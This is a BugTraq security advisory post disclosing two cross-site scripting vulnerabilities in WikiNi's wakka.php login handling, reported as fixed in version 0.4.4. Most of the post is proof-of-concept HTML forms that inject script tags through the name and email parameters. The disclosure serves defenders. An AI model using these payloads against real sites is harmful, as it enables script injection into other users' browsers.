BugTraq
WikiNi Multiple Cross Site Scripting Vulnerabilities Oct 23 2006 07:26PM
raphael huck free fr
Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4.

The name parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>

The email parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>

Original advisory: http://zone14.free.fr/advisories/6/

--Raphael HUCK

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus